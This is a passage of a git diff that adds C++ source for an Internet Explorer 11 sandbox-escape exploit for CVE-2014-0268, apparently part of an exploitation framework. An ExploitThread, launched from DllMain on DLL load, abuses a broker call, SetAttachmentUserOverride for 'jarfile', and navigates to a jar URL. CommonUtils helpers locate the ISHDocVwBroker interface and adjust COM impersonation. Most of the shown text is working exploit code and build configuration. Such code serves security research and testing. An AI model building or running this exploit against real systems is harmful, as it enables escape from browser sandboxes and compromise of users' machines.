+	try
+	{	
+		HRESULT ret;
+		shdocvw = CreateSHDocVw();
+						
+		CLSID clsid;
+
+		CLSIDFromString(L"{0002DF01-0000-0000-C000-000000000046}", &clsid);
+
+		IWebBrowser2Ptr browser;
+
+		ret = CoCreateInstance(clsid, nullptr, CLSCTX_SERVER, IID_PPV_ARGS(&browser));
+		if (FAILED(ret))
+		{
+			DebugPrintf("CoCreateInstance: %08X", ret);
+			throw new _com_error(ret);
+		}
+
+		DebugPrintf("browser: %p", browser);
+
+		unsigned char buf[1] = { 0 };
+
+		ret = shdocvw->SetAttachmentUserOverride(L"jarfile");
+		if (FAILED(ret))
+		{
+			DebugPrintf("Failed to set attachement user override\n");
+			throw new _com_error(ret);
+		}
+
+		bstr_t nav = L"http://www.dummy.local/testapp.jar";
+
+		DebugPrintf("Navigate: %08X", browser->Navigate(nav, nullptr, nullptr, nullptr, nullptr));			
+	}
+	catch (_com_error e)
+	{
+		DebugPrintf("Error during processing: %ls\n", e.ErrorMessage());
+	}	
+
+	if (shdocvw)
+	{
+		shdocvw->Release();
+		shdocvw = nullptr;
+	}
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+	CoInitialize(nullptr);
+	DoSetAttachmentUserOverride();
+	CoUninitialize();
+
+	FreeLibraryAndExitThread((HMODULE)hModule, 0);
+
+	return 0;
+}
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj
new file mode 100755
index 0000000000..ae208e17c4
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj
@@ -0,0 +1,183 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20140268</RootNamespace>
+    <ProjectName>CVE-2014-0268</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2014-0268.cpp" />
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+      <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp
new file mode 100755
index 0000000000..042cf2c7c4
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp
@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp
new file mode 100755
index 0000000000..11763c77a3
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h
new file mode 100755
index 0000000000..562cb0adb0
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h
@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj b/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj
new file mode 100755
index 0000000000..2e2b9ea000
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj
@@ -0,0 +1,154 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CommandUtils</RootNamespace>
+    <ProjectName>CommonUtils</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>StaticLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>StaticLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>StaticLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>StaticLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="regln.h" />
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+    <ClInclude Include="Utils.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="regln.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="Utils.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp
new file mode 100755
index 0000000000..dbc6eeeb92
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp
@@ -0,0 +1,373 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+
+#include "Utils.h"
+
+#include <strsafe.h>
+#include <sddl.h>
+#include <Shlwapi.h>
+
+#pragma comment(lib, "shlwapi.lib")
+
+static BOOL g_hasShDocIID;
+static IID g_shDocIID;
+
+BOOL GetIIDForName(LPCWSTR lpName, IID* riid)
+{
+	HKEY hRoot = nullptr;
+	ULONG status;
+
+	status = RegOpenKeyEx(HKEY_CLASSES_ROOT, L"Interface", 0, KEY_ENUMERATE_SUB_KEYS, &hRoot);
+	if (status == 0)
+	{
+		WCHAR keyName[128];
+		DWORD index = 0;
+		BOOL foundKey = FALSE;
+
+		while (true)
+		{
+			HKEY hSubKey;
+
+			status = RegEnumKeyW(hRoot, index, keyName, _countof(keyName));
+			if (status != 0)
+			{
+				break;
+			}
+
+			index++;
+
+			status = RegOpenKeyEx(hRoot, keyName, 0, KEY_QUERY_VALUE, &hSubKey);
+			if (status != 0)
+			{
+				continue;
+			}
+
+			DWORD dwType;
+			WCHAR valueName[256];
+			DWORD dwSize = sizeof(valueName)-sizeof(WCHAR);
+
+			status = RegQueryValueEx(hSubKey, nullptr, nullptr, &dwType, (BYTE*)valueName, &dwSize);
+			RegCloseKey(hSubKey);
+
+			if ((status != 0) || (dwType != REG_SZ))
+			{
+				continue;
+			}
+
+			// Ensure NUL terminate
+			valueName[dwSize / sizeof(WCHAR)] = 0;
+
+			if (_wcsicmp(valueName, lpName) == 0)
+			{
+				foundKey = TRUE;
+				break;
+			}
+		}
+
+		RegCloseKey(hRoot);
+
+		if (foundKey)
+		{
+			return SUCCEEDED(IIDFromString(keyName, riid));
+		}
+	}
+	else
+	{
+		DebugPrintf("Could not open Interface key %d\n", status);
+	}
+
+	return FALSE;
+}
+
+REFIID GetSHDocIID()
+{
+	if (!g_hasShDocIID)
+	{
+		memset(&g_shDocIID, 0, sizeof(g_shDocIID));
+
+		g_hasShDocIID;
+
+		GetIIDForName(L"ISHDocVwBroker", &g_shDocIID);
+	}
+
+	return g_shDocIID;
+}
+
+bstr_t GetTemp(LPCWSTR name)
+{
+	WCHAR tempPath[MAX_PATH];
+
+	GetTempPath(MAX_PATH, tempPath);
+
+	PathAppend(tempPath, name);
+
+	return tempPath;
+}
+
+bstr_t GetTempPath()
+{
+	WCHAR tempPath[MAX_PATH];
+
+	GetTempPath(MAX_PATH, tempPath);
+
+	return tempPath;
+}
+
+bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len)
+{
+	WCHAR tempPath[MAX_PATH];
+
+	GetTempPath(MAX_PATH, tempPath);
+
+	PathAppend(tempPath, name);
+
+	FILE* fp = nullptr;
+
+	if (_wfopen_s(&fp, tempPath, L"wb") == 0)
+	{
+		fwrite(buf, 1, len, fp);
+
+		fclose(fp);
+
+		return tempPath;
+	}
+	else
+	{
+		return L"";
+	}
+}
+
+std::vector<unsigned char> ReadFileToMem(LPCWSTR name)
+{
+	FILE* fp;
+	std::vector<unsigned char> ret;
+
+	if (_wfopen_s(&fp, name, L"rb") == 0)
+	{
+		fseek(fp, 0, SEEK_END);
+
+		ret.resize(ftell(fp));
+		fseek(fp, 0, SEEK_SET);
+
+		fread(&ret[0], 1, ret.size(), fp);
+
+		fclose(fp);
+	}
+
+	return ret;
+}
+
+void DebugPrintf(LPCSTR lpFormat, ...)
+{
+#ifdef _DEBUG 
+	CHAR buf[1024];
+	va_list va;
+
+	va_start(va, lpFormat);
+
+	StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
+
+	OutputDebugStringA(buf);
+#endif
+}
+
+bstr_t GetUserSid()
+{
+	HANDLE hToken = nullptr;
+	PTOKEN_USER pUser = nullptr;
+	LPWSTR userName = nullptr;
+	bstr_t ret;
+
+	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
+	{
+		DebugPrintf("Error opening process token: %d", GetLastError());
+		goto error;
+	}
+
+	//TOKEN_USER user = { 0 };
+	DWORD retLength = 0;
+
+	if (!GetTokenInformation(hToken, TokenUser, nullptr, 0, &retLength))
+	{
+		if (GetLastError() != ERROR_INSUFFICIENT_BUFFER)
+		{
+			DebugPrintf("Error getting token information size: %d", GetLastError());
+			goto error;
+		}
+	}
+
+	pUser = (PTOKEN_USER) new char[retLength];
+
+	if (!GetTokenInformation(hToken, TokenUser, pUser, retLength, &retLength))
+	{
+		DebugPrintf("Error getting token information: %d", GetLastError());
+		goto error;
+	}
+
+	if (!ConvertSidToStringSidW(pUser->User.Sid, &userName))
+	{
+		DebugPrintf("Error converting Sid to String: %d", GetLastError());
+		goto error;
+	}
+
+	ret = userName;
+
+error:
+
+	if (hToken)
+	{
+		CloseHandle(hToken);
+	}
+
+	if (pUser)
+	{
+		delete[] pUser;
+	}
+
+	if (userName)
+	{
+		LocalFree(userName);
+	}
+
+	return ret;
+}
+
+typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
+
+GUID CLSID_CShdocvwBroker = { 0x9C7A1728,
+0x0B694, 0x427A, { 0x94, 0xA2, 0xA1, 0xB2, 0xC6, 0x0F, 0x03, 0x60 } };
+
+void DisableImpersonation(IUnknown* pUnk)
+{
+	IClientSecurity* sec = nullptr;
+
+	HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec));
+	if (SUCCEEDED(hr))
+	{
+		hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_ANONYMOUS, nullptr, EOAC_NONE);
+		DebugPrintf("SetBlanket: %08X", hr);
+		sec->Release();
+	}
+	else
+	{
+		DebugPrintf("Error getting client security: %08X", hr);
+	}
+}
+
+void SetCloaking(IUnknown* pUnk)
+{
+	IClientSecurity* sec = nullptr;
+
+	HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec));
+	if (SUCCEEDED(hr))
+	{
+		hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT,
